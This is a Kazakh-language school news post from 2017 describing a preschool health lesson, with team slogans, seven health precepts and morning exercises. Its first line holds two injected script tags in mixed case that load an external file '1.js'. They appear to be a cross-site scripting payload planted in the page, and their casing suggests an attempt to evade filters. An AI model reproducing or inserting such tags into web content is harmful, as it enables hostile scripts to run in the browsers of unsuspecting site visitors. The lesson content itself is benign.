<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

25.02.2017

Денсаулық-зор байлық

Мектепалды даярлық сыныбында «Денсаулық-зор байлық» атты тәрбие сағаты өтті. Тәрбие сағатының мақсаты- балаларды жас кезінен салауатты өмір салтын ұстанып, денсаулыққа зиян қылықтардан сақтандырып, гигиена талаптарын сақтай білетін азамат тәрбиелеу. Барлық байлық-денсаулық екендігіне көздерін жеткізу.

Оқушыларды 3 топқа бөліп, әр топқа ат қойылды:

1-топ- Денсаулық

2-топ –Тазалық

3-топ-Спорт

Әр топтың өз ұрандары болды.

1-топ: Денсаулық-зор байлық

2-топ-Тазалық-саулық негізі.

3-топ: Спорт менің-күш-қуатым.

Денсаулық деген не? Оны қалай сақтау керек?-деген сұрақтарға жауап берілді.

Лұқпан Хакімнің 7 өсиеті жатқа айтылып, есте сақталу керек екені түсіндірілді.

1- ерте тұру;

2- орта тазалығын сақтау;

3- денені шынықтырып отыру;

4- денеңді үнемі таза ұстау;

5- Үнемі сергек жүру, еңбек ету;

6- Тамақты уақытында ішіп, артық тамақ ішпеу;

7- Көп ұйықтап, жалқау болмау.

Оқушылар ертеңгілік жаттығулар түрлерін және сергіту сәттерін көрсетті.

Міне, бұлардың бәрі- денсаулықты сақтаудың негізгі кепілі. Денің сау болса, барлық мақсаттарыңа қол жеткізесіңдер!

Просмотров: 608


Пікір қосу



Деректерді қолтаңбаға қосу